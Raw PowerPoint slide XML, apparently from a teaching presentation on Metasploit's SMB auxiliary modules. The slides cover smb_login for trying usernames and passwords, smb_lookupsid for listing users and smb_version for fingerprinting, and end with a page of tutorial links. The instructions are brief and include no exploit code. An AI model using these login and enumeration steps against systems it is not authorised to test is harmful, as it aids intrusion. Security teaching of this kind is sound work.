              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Supports ranges of IPs, wildcards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Network, broadcast addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition>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3" name="Shape 663"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Shape 664"/>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SMB_Login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665" name="Shape 665"/>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rPr lang="en"/>
              <a:t>To attempt to login to SMB, use the ‘.../smb_login’, set the IP, user, and pass, and then run it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="666" name="Shape 666"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20360" l="16255" r="31002" t="55720"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2811900"/>
            <a:ext cx="9144000" cy="2331600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition>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0" name="Shape 670"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Shape 671"/>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Lookupsid</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Shape 672"/>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rPr lang="en"/>
              <a:t>Using .../smb_lookupsid, we can view all users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="673" name="Shape 673"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="18905" l="17191" r="29831" t="24728"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1872900" y="1914100"/>
            <a:ext cx="5398199" cy="3229399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition>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7" name="Shape 677"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Shape 678"/>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SMB Version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Shape 679"/>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rPr lang="en"/>
              <a:t>By using ‘.../smb_version’, we can determine what version of SMB the target IP is running</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="680" name="Shape 680"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20358" l="17425" r="32872" t="67161"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3243058"/>
            <a:ext cx="9144000" cy="1290915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>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4" name="Shape 684"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685" name="Shape 685"/>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Sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686" name="Shape 686"/>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en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.taqrimibadi.com/2013/04/exploit-metasploit-linux-kernel-26x.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://community.rapid7.com/docs/DOC-1875</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson2/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://nmap.org/nmap_doc.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>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light-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